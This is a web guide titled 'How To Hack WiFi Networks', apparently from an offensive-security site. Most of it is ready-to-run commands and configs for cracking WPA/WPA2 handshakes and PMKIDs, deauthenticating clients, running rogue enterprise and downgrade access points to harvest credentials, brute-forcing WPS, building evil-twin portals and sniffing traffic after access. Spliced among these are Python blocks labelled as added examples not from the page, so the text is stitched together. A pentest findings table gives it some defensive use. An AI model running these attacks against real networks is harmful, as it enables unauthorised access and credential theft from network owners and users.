How To Hack WiFi Networks (Guide) | Black Hat HQ

How To Hack WiFi Networks


Comprehensive WiFi security assessment methodology. This is a detailed guide on how to hack WiFi networks.


Hardware Requirements


A basic internal WiFi card won't cut it. You need a card that supports monitor mode and packet injection.


```bash
# Check if your current card supports monitor mode
iw list | grep -A 10 "Supported interface modes" | grep -E "monitor|AP"
```

| Chipset | Recommended Adapters | Notes |
|---|---|---|
| MT76x2U | Alfa AWUS036ACM, Panda PAU09 | Modern AC, excellent injection, well-supported in Kali |
| RTL88x2BU | Alfa AWUS036ACH, Panda PAU0D | AC1200, monitor mode works but injection hit-or-miss |
| AR9271 | Alfa AWUS036NHA, TP-Link TL-WN722N v1 | 2.4GHz only, N150, but bulletproof reliability |
| RTL8812AU | Alfa AWUS036AC, Alfa AWUS036ACH | Older AC card but well-tested, solid injection |


Alfa AWUS036ACM is the current sweet spot. Supports 2.4GHz and 5GHz, AC speeds, reliable monitor mode and injection.


Verify with:


```bash
airmon-ng
# Should list your adapter with chipset info
```

The Protocol Landscape


| Protocol | Introduced | Current Status | Attack Surface |
|---|---|---|---|
| WEP | 1999 | Dead. Should not exist in 2026. | Trivial: IV reuse + statistical attacks. Minutes. |
| WPA | 2003 | Effectively dead. Uses TKIP. | Handshake capture + dictionary/brute force. |
| WPA2-PSK | 2004 | Still widely deployed. | Handshake capture + cracking. PMKID attack. |
| WPA2-Enterprise | 2004 | Common in corporate environments. | RADIUS misconfig, rogue AP, credential theft. |
| WPA3-Personal | 2018 | Growing adoption. | Dragonblood downgrade. Transition mode downgrade to WPA2. |
| WPA3-Enterprise | 2018 | Growing adoption. | 192-bit mode very strong. Transition mode weaknesses. |


Phase 1: Reconnaissance


Enable Monitor Mode


```bash
# Kill interfering processes
sudo airmon-ng check kill

# Start monitor mode on wlan0
sudo airmon-ng start wlan0

# Verify (interface is now wlan0mon)
iwconfig wlan0mon
# Mode should show "Monitor"
```

Passive Scanning


```bash
# Basic scan
sudo airodump-ng wlan0mon

# Targeted scan — hop only channels 1, 6 and 11, filter on one BSSID, write to file
sudo airodump-ng -c 1,6,11 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# 5GHz scan (specify band)
sudo airodump-ng --band a -w capture_5ghz wlan0mon

# GPS-enabled wardriving output
sudo airodump-ng --gpsd -w wardrive wlan0mon
```

From the airodump output:


  • BSSID: MAC address of the AP (tells you manufacturer)

  • Channel: Which frequency the AP operates on

  • ENC: Security protocol (WPA2, WPA3, WEP, OPN)

  • CIPHER: CCMP (AES), TKIP, or GCMP (WPA3)

  • AUTH: PSK, MGT (Enterprise), SAE (WPA3), OWE (enhanced open)

  • Clients (STATION): Connected devices, their MAC addresses, and probe requests

  • Probes: Networks the clients are looking for — this is gold for evil twin attacks


5GHz vs 2.4GHz


```bash
# Your card might only do 2.4GHz in monitor mode. Check:
iw list | grep -A 20 "Frequencies"

# 5GHz has more channels (36-165), less crowded, but shorter range
# 2.4GHz has channels 1-11 (US), 1-13 (EU), 1-14 (Japan)
```

Phase 2: WPA2-PSK - Handshake Capture


This is the standard attack against most home and small business networks.


The 4-Way Handshake


When a client connects (or reconnects) to a WPA2 network, the four-way handshake exchanges cryptographic material that proves both sides know the pre-shared key. Capturing this handshake gives you the material needed to crack the password offline.


Capture Methods


Method 1: Wait for a client to connect


```bash
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
# Wait for a client to appear in the STATION column
# Handshake captured when "WPA handshake: AA:BB:CC:DD:EE:FF" appears in top-right
```

Method 2: Deauthentication attack (force reconnect)


```bash
# In terminal 1: capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# In terminal 2: deauth a specific client
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon

# Or broadcast deauth (all clients, louder)
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
```

-0 = deauthentication, 5 = number of packets, -a = AP MAC, -c = client MAC (optional, omit for broadcast).


The client disconnects briefly, then automatically reconnects. The reconnection triggers the four-way handshake. Terminal 1 captures it. Takes seconds.


PMKID Attack (No Clients Required)


This is the quieter, more modern approach. No deauth needed. No clients needed. Works against most WPA/WPA2 networks that have PMKID enabled (common).


```bash
# Step 1: Capture PMKID from the AP
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

# Let it run. It sends association requests and captures PMKID in the response.
# Press Ctrl+C after a few minutes.

# Step 2: Convert PMKID to hashcat format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng

# Step 3: Crack
hashcat -m 22000 pmkid.hc22000 wordlist.txt
```

The beauty of the PMKID attack: no clients, no deauth, passive to the casual observer. The AP just hands you the crackable material in response to a standard association request.
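The reason both the four-way handshake and the PMKID are crackable offline is that every secret involved is derived from the passphrase and public values only. The following added example (not code from the page) reproduces that derivation in Python: PMK from passphrase and SSID, PMKID from PMK and the two MAC addresses, then a single offline guess. The SSID/passphrase pair is the IEEE 802.11i Annex H test vector; the MAC addresses are made up.

```python
import hashlib
import hmac

# Constructed sample values; the passphrase/SSID pair is the IEEE 802.11i Annex H
# test vector, the MAC addresses are made up.
SSID = "IEEE"
PASSPHRASE = "password"
AP_MAC = bytes.fromhex("aabbccddeeff")
STA_MAC = bytes.fromhex("112233445566")


def derive_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the only salt, so precomputation is per network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_pmkid(pmk, ap_mac, sta_mac):
    """PMKID = HMAC-SHA1(PMK, "PMK Name" || AP MAC || STA MAC)[:16].
    This is the value the AP can hand out in its first EAPOL frame."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def pmkid_matches(candidate, ssid, ap_mac, sta_mac, pmkid):
    """One offline guess: nothing but the captured PMKID and MACs is needed,
    which is why the cost of the attack is set entirely by passphrase entropy."""
    guess = derive_pmkid(derive_pmk(candidate, ssid), ap_mac, sta_mac)
    return hmac.compare_digest(guess, pmkid)


def guesses_per_second_to_exhaust(keyspace, hours):
    """Rate a cracker needs to cover a keyspace in the given time."""
    return keyspace / (hours * 3600)


if __name__ == "__main__":
    pmk = derive_pmk(PASSPHRASE, SSID)
    pmkid = derive_pmkid(pmk, AP_MAC, STA_MAC)
    print("PMK  :", pmk.hex())
    print("PMKID:", pmkid.hex())
    print("correct passphrase:", pmkid_matches("password", SSID, AP_MAC, STA_MAC, pmkid))
    print("wrong passphrase  :", pmkid_matches("Password1", SSID, AP_MAC, STA_MAC, pmkid))
    # An 8-digit numeric default vs. a 16-character random alphanumeric passphrase, 24 h budget
    print(f"8 digits : {guesses_per_second_to_exhaust(10**8, 24):.0f} guesses/s")
    print(f"16 alnum : {guesses_per_second_to_exhaust(62**16, 24):.2e} guesses/s")
```

The last two lines are the defender's takeaway: a long random passphrase moves the required guess rate far beyond any GPU rig, while the 4096 PBKDF2 iterations alone do not.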


Phase 3: Cracking the Handshake


Hashcat (GPU — Fast)


```bash
# WPA/WPA2 handshake (mode 22000)
hashcat -m 22000 handshake.hc22000 wordlist.txt

# With rules (mutates dictionary)
hashcat -m 22000 handshake.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule

# Brute force (8 digits — many default router PINs)
hashcat -m 22000 -a 3 handshake.hc22000 ?d?d?d?d?d?d?d?d

# Mask attack (known pattern — e.g., "Company" + 2 digits)
hashcat -m 22000 -a 3 handshake.hc22000 Company?d?d

# With GPU monitoring
hashcat -m 22000 handshake.hc22000 wordlist.txt --status --status-timer=5
```

John the Ripper (CPU — Slower)


```bash
# Convert the airodump-ng capture (handshake-01.cap) straight to John's format
wpapcap2john handshake-01.cap > handshake.john

# Crack
john --wordlist=/usr/share/wordlists/rockyou.txt handshake.john
```

Optimized Hashcat Workflow


```bash
# 1. Convert pcap to hashcat format
hcxpcapngtool -o target.hc22000 -E essidlist target.pcapng

# 2. Quick dictionary pass
hashcat -m 22000 target.hc22000 /usr/share/wordlists/rockyou.txt -O

# 3. Dictionary + best64 rules (finds most human-chosen passwords)
hashcat -m 22000 target.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule -O

# 4. Mask attack for 10-digit phone numbers (common ISP router default)
hashcat -m 22000 -a 3 target.hc22000 ?d?d?d?d?d?d?d?d?d?d -O

# 5. Combinator attack (two words combined)
hashcat -m 22000 -a 1 target.hc22000 wordlist.txt wordlist.txt -O
```

Wordlists


```bash
# Rockyou (classic, ~14M passwords) ships gzipped on Kali; unpack it first
gunzip /usr/share/wordlists/rockyou.txt.gz

# SecLists (comprehensive, maintained)
git clone https://github.com/danielmiessler/SecLists.git

# Custom wordlist from target recon
# Combine company names, local sports teams, street names, years, seasons
```

Phase 4: WPA2-Enterprise Attacks


Corporate networks use RADIUS (802.1X) with username/password or certificate-based auth. The attack is a credential-harvesting rogue AP.


Rogue AP with EAP Credential Capture


```bash
# Use hostapd-wpe (Wireless Pwnage Edition)
sudo apt install hostapd-wpe

# Configuration
cat > rogue_enterprise.conf << 'EOF'
interface=wlan0mon
ssid=CorpWiFi
channel=6
hw_mode=g
ieee8021x=1
eap_server=1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/certs/dh
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
EOF

# Launch
sudo hostapd-wpe rogue_enterprise.conf
```

When a client connects, hostapd-wpe terminates the EAP session at the server-hello, extracts the challenge/response material, and logs it. You get:


  • Username (plaintext — it's in the EAP identity response)

  • NetNTLMv1 challenge/response (crackable with hashcat mode 5500)

  • MSCHAPv2 challenge/response (crackable with hashcat mode 14000)


```bash
# Crack captured MSCHAPv2
hashcat -m 14000 mschapv2.hash wordlist.txt

# Crack NetNTLMv1
hashcat -m 5500 netntlmv1.hash wordlist.txt
```

Real-World Enterprise Attack Flow


1. Discover the SSID (passive scan — clients probing for "CorpWiFi")
2. Set up rogue AP with same SSID, Enterprise EAP, on a different channel
3. Deauth a client from the real AP
4. Client auto-reconnects to your rogue AP (stronger signal or same SSID)
5. hostapd-wpe captures credentials or challenge/response
6. Crack offline, gain domain credentials

This is devastating when it works. One captured domain user account often leads to full network compromise.


Phase 5: WPA3 Attacks


Dragonblood Downgrade


WPA3's SAE handshake is resistant to offline dictionary attacks. But most WPA3 networks run in "transition mode" (WPA2+WPA3 simultaneously for backward compatibility).


Attack: Downgrade the WPA3 AP to WPA2, then capture the WPA2 handshake.


```bash
# 1. Create a rogue AP with same SSID, but WPA2-only
cat > dragonblood.conf << 'EOF'
interface=wlan0mon
ssid=TargetWPA3
channel=6
hw_mode=g
wpa=2
wpa_passphrase=doesntmatter
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
EOF

# 2. Launch rogue AP
sudo hostapd dragonblood.conf

# 3. Deauth client from real WPA3 AP
sudo aireplay-ng -0 10 -a REAL_AP_MAC -c CLIENT_MAC wlan0mon

# 4. Client reconnects to your WPA2 rogue AP, sends WPA2 handshake
# 5. Capture it with airodump-ng on a different interface
# 6. Crack with hashcat (mode 22000)
```

The client doesn't know it was downgraded. It thinks the real AP just switched to WPA2.
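From the AP operator's side, the downgrade only works because the legitimate AP advertises WPA-PSK next to SAE. The following added example (not code from the page) audits a hostapd.conf for the settings this guide relies on: transition-mode key management, optional PMF (which is what lets the unauthenticated deauth frames in Phase 2 and step 3 above through), TKIP, and WPS. The two configs are constructed; their keys are standard hostapd options.

```python
# Constructed hostapd configurations (not the page's rogue-AP configs); the first is
# the transition-mode deployment the text describes, the second the WPA3-only form.
TRANSITION_MODE = """\
interface=wlan0
ssid=TargetWPA3
wpa=2
wpa_passphrase=CorrectHorseBatteryStaple
wpa_key_mgmt=WPA-PSK SAE
wpa_pairwise=CCMP
ieee80211w=1
wps_state=2
"""
WPA3_ONLY = """\
interface=wlan0
ssid=TargetWPA3
wpa=2
sae_password=CorrectHorseBatteryStaple
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
ieee80211w=2
wps_state=0
"""

def parse_hostapd_conf(text):
    """key=value lines; comments and blanks ignored."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf

def audit_hostapd(text):
    """Return the weaknesses this guide exploits, as found in an AP config."""
    c = parse_hostapd_conf(text)
    akm = set(c.get("wpa_key_mgmt", "").split())
    findings = []
    if c.get("wpa") != "2":
        findings.append("wpa != 2: WPA/TKIP negotiable (RSN-only is wpa=2)")
    if {"SAE", "WPA-PSK"} <= akm:
        findings.append("transition mode: WPA-PSK and SAE both offered, WPA2 downgrade possible")
    if "SAE" in akm and c.get("ieee80211w") != "2":
        findings.append("ieee80211w != 2: PMF optional, unauthenticated deauth frames still honoured")
    if "TKIP" in c.get("wpa_pairwise", "") + c.get("rsn_pairwise", ""):
        findings.append("TKIP pairwise cipher enabled")
    if c.get("wps_state", "0") != "0":
        findings.append("WPS enabled: PIN brute force / Pixie Dust exposure")
    return findings
```

Where WPA3-only is not yet possible because of legacy clients, the audit still shows which of the remaining findings (PMF, WPS) can be closed without breaking them.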


WPA3-SAE Timing Side Channels


Some WPA3 implementations leak timing information during SAE that enables offline dictionary attacks.


Tools:


```bash
# DragonSlayer — tests for timing leaks in WPA3 SAE
git clone https://github.com/vanhoefm/dragonslayer
cd dragonslayer
# Requires specific card with firmware modifications
```

This is more academic/research-grade. For a practical pentest, the transition mode downgrade attack is more reliable.


Phase 6: WPS Attacks


WiFi Protected Setup was designed for easy connectivity with a PIN. The PIN is 8 digits, validated in two halves — making it trivially brute-forceable.


WPS PIN Brute Force


```bash
# Check if WPS is enabled
sudo wash -i wlan0mon
# "WPS Locked: No" means it's vulnerable

# Reaver — classic WPS PIN attack
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv

# Pixie Dust attack (faster, offline, works on many Ralink/MediaTek/Broadcom chipsets)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1 -vv

# Bully — alternative to Reaver, sometimes faster
sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF -c 6
```

The Pixie Dust attack exploits weak randomness in the WPS exchange to compute the PIN offline in seconds. When it works, you get the WPA passphrase in under a minute.

WPS is deprecated in WPA3. But millions of WPA2 APs still have it enabled. It's the fastest way into many networks.
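To make the "validated in two halves" point concrete, here is an added example (not from the page) that computes the WPS PIN checksum digit and compares the worst-case number of online guesses with and without the split validation. The checksum weighting is the one defined in the WPS specification; the PIN values are illustrative.

```python
def wps_checksum(pin7: int) -> int:
    """Checksum digit appended to the 7 significant digits of a WPS PIN.
    Digits are weighted 3,1,3,1,... starting from the least significant one."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True when the 8-digit PIN carries the correct checksum digit."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


def max_online_guesses(split_validation: bool) -> int:
    """Worst-case guesses an AP must answer before the PIN is known.
    Because the protocol confirms the first 4 digits on their own, an attacker
    searches 10^4 for the first half and then only 10^3 for the second half
    (its last digit is the checksum). Without the split, 7 free digits remain."""
    return 10**4 + 10**3 if split_validation else 10**7


if __name__ == "__main__":
    print("12345670 valid:", is_valid_wps_pin("12345670"))   # the textbook example PIN
    print("with split  :", max_online_guesses(True))
    print("without     :", max_online_guesses(False))
```

At the one guess every second or two a typical AP allows, 11,000 guesses is a few hours, which is the "hours" figure in the findings table; rate limiting ("WPS Locked") only slows this, disabling WPS removes it.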


Phase 7: Evil Twin / Captive Portal Attack


For networks where you can't crack the password, you trick users into giving it to you.


```bash
# Use Fluxion, Airgeddon, or Wifiphisher
# These automate the full evil twin workflow:

# Airgeddon (Kali)
git clone https://github.com/v1s1t0r1sh3r3/airgeddon
cd airgeddon
sudo bash airgeddon.sh
# Interactive menu guides you through:
# 1. Monitor mode
# 2. Select target AP
# 3. Deauth clients
# 4. Spawn rogue AP with captive portal
# 5. Captured password validated against real AP
```

Manual Approach with hostapd + dnsmasq + Node/BetterCap


```bash
# 1. Create rogue AP (hostapd)
# 2. DHCP server (dnsmasq — gives clients IPs)
# 3. Captive portal (Python Flask or Node.js)
# 4. When user enters password, verify it against the real AP
# 5. If correct, stop the attack and present a "connected" page
```

The captive portal mimics the real AP's login page. A user connects, gets a "WiFi authentication required" page, enters the password, you capture it, validate it, and your rogue AP disappears. The user connects to the real AP seconds later, thinking there was a glitch.


Phase 8: Post-Connection Attacks


Once you have network access, standard network pentesting applies. WiFi-specific post-connection attacks:


ARP Spoofing / MITM


```bash
# BetterCap
sudo bettercap -eval "net.probe on; net.sniff on"

# Or manual
sudo arpspoof -i wlan0 -t VICTIM_IP -r GATEWAY_IP
```

Credential Sniffing


```bash
# BetterCap HTTP/HTTPS credential harvesting
sudo bettercap -eval "net.probe on; http.proxy on; https.proxy on"

# Responder — NTLM hash capture (particularly effective on Windows networks)
sudo responder -I wlan0 -w -v
```

Network Segmentation Testing


Once on the WiFi, test VLAN hopping, inter-client isolation, and guest-to-corporate network traversal:


```bash
# Scan for other networks
nmap -sn 192.168.0.0/16

# Test gateway traversal
ip route show
ping other_subnet_gateway

# VLAN hopping (if 802.1Q is accessible)
```

Phase 9: KARMA / Probe Request Exploitation


Clients constantly broadcast "probe requests" — "Hey, is WiFi-Network-X here?"


```bash
# KARMA attack — respond "YES" to every probe request
# Clients automatically connect

# hostapd with KARMA patch, or use Pwnagotchi

# Passive probe harvesting
sudo airodump-ng wlan0mon --output-format csv -w probes
# Check probes-01.csv for client search history
```

This reveals:


  • Hidden SSIDs (networks configured to not broadcast — but clients broadcast them anyway)

  • Networks the target has previously connected to (build an attack list)

  • Travel history (airport WiFi, hotel WiFi, conference WiFi)
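Both the airodump-ng column walkthrough in Phase 1 and the probe harvesting here end in the same file: the CSV airodump-ng writes. The following added example (not code from the page) parses that CSV, flags the AP configurations the protocol table calls weak, and inverts the station table into "which clients are searching for which ESSID", which is what a defender reviews to decide which saved profiles to purge from corporate devices. The CSV excerpt is constructed; MACs and names are made up.

```python
# Constructed airodump-ng CSV excerpt (column layout of --output-format csv); values are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2026-01-01 09:00:00, 2026-01-01 09:10:00,  6,  54, WPA2, CCMP, PSK, -45, 120, 0,   0.  0.  0.  0,  7, HomeNet,
AA:BB:CC:00:00:02, 2026-01-01 09:00:00, 2026-01-01 09:10:00, 11,  54, WEP, WEP, , -60,  80, 0,   0.  0.  0.  0,  6, OldCam,
AA:BB:CC:00:00:03, 2026-01-01 09:00:00, 2026-01-01 09:10:00, 36, 866, WPA3 WPA2, CCMP, SAE PSK, -50, 200, 0,   0.  0.  0.  0,  8, CorpWiFi,
AA:BB:CC:00:00:04, 2026-01-01 09:00:00, 2026-01-01 09:10:00,  1,  54, WPA2, TKIP, PSK, -70,  30, 0,   0.  0.  0.  0,  0, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2026-01-01 09:01:00, 2026-01-01 09:09:00, -50,  40, AA:BB:CC:00:00:01, HomeNet,Airport-Free-WiFi,HotelGuest
11:22:33:44:55:77, 2026-01-01 09:02:00, 2026-01-01 09:08:00, -65,  12, (not associated), CorpWiFi
"""

def parse_airodump_csv(text):
    """Split the two sections airodump-ng writes (APs, then stations) into dicts."""
    ap_text, _, sta_text = text.partition("Station MAC,")
    aps = []
    for line in ap_text.splitlines()[1:]:          # [0] is the AP header row
        if line.strip():
            f = [x.strip() for x in line.split(",")]
            aps.append({"bssid": f[0], "privacy": f[5], "cipher": f[6], "auth": f[7], "essid": f[13]})
    stations = []
    for line in sta_text.splitlines()[1:]:         # [0] is the rest of the station header
        if line.strip():
            f = [x.strip() for x in line.split(",", 6)]   # probe list itself contains commas
            probes = [p.strip() for p in f[6].split(",") if p.strip()] if len(f) > 6 else []
            stations.append({"mac": f[0], "bssid": f[5], "probes": probes})
    return aps, stations

def weak_ap_findings(aps):
    """Flag the configurations the protocol table above calls out as weak."""
    out = []
    for ap in aps:
        tag = f"{ap['bssid']} {ap['essid'] or '<hidden>'}"
        if ap["privacy"] in ("WEP", "OPN"):
            out.append(f"{tag}: {ap['privacy']} provides no usable confidentiality")
        if "TKIP" in ap["cipher"]:
            out.append(f"{tag}: TKIP cipher still enabled, should be CCMP/GCMP only")
        if "WPA3" in ap["privacy"] and "WPA2" in ap["privacy"]:
            out.append(f"{tag}: WPA3 transition mode, WPA2 downgrade possible")
        if not ap["essid"]:
            out.append(f"{tag}: hidden SSID, clients still broadcast it in probes")
    return out

def probed_networks(stations):   # ESSID -> stations asking for it (the probe history above)
    seen = {}
    for st in stations:
        for essid in st["probes"]:
            seen.setdefault(essid, []).append(st["mac"])
    return seen
```

Run it against a real probes-01.csv and every ESSID in the result that is not one of your own networks is a saved profile a KARMA-style AP could answer for.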


Quick Reference: Attack Decision Tree


```text
WiFi Network Found
├── WEP? → aircrack-ng (minutes, statistical attack)
├── WPA/WPA2-PSK?
│   ├── WPS enabled? → Reaver / Pixie Dust (minutes)
│   ├── Clients connected? → Deauth + handshake capture + hashcat (hours-days)
│   ├── No clients, PMKID enabled? → hcxdumptool PMKID attack + hashcat
│   └── No clients, no PMKID? → Evil twin + captive portal (social)
├── WPA2-Enterprise?
│   ├── hostapd-wpe rogue AP → capture credentials/hashes
│   └── AS-REP roasting if you get on the network
├── WPA3-Personal?
│   ├── Transition mode? → Downgrade to WPA2 + handshake capture
│   └── Pure WPA3? → DragonSlayer timing attack (if vulnerable implementation)
├── WPA3-Enterprise?
│   └── Transition mode downgrade to WPA2-Enterprise
└── Open Network?
    ├── Captive portal bypass? (MAC spoofing, DNS tunneling)
    └── Direct connection → network scanning
```

Coworking / Physical Access Angle


If you're in the building with a target device:


```bash
# WiFite — automated attack
sudo wifite --kill

# Wifipumpkin3 — full framework
sudo wifipumpkin3

# Pwnagotchi — AI-powered WiFi pwning (runs on Pi Zero W)
# Learns from its environment, automates deauth + handshake capture
```

Common Pentest Findings to Document


| Finding | CVSS | Impact |
|---|---|---|
| WPS still enabled on WPA2 AP | 7.5 | Brute-forceable PIN → full network access in hours |
| WPA3 transition mode allowing WPA2 downgrade | 6.5 | Undermines WPA3's brute-force resistance |
| Default credentials on AP admin panel | 9.0 | Full AP configuration control |
| Guest network not isolated from corporate VLAN | 8.5 | Guest users can access internal resources |
| 802.1X misconfigured — accepts any certificate | 7.5 | Rogue AP can capture domain credentials |
| No client isolation on public/guest WiFi | 5.0 | Lateral movement between clients |
| Weak PSK (dictionary-word-based) | 7.0 | Crackable in hours with standard wordlists |
| Management interface accessible via WiFi | 8.0 | AP admin panel reachable from wireless clients |
| MAC filtering as sole access control | 4.0 | Trivially bypassed with MAC spoofing |
| Hidden SSID relied upon for security | 3.0 | SSID is broadcast in probe requests and handshakes |


© 2026 Black Hat HQ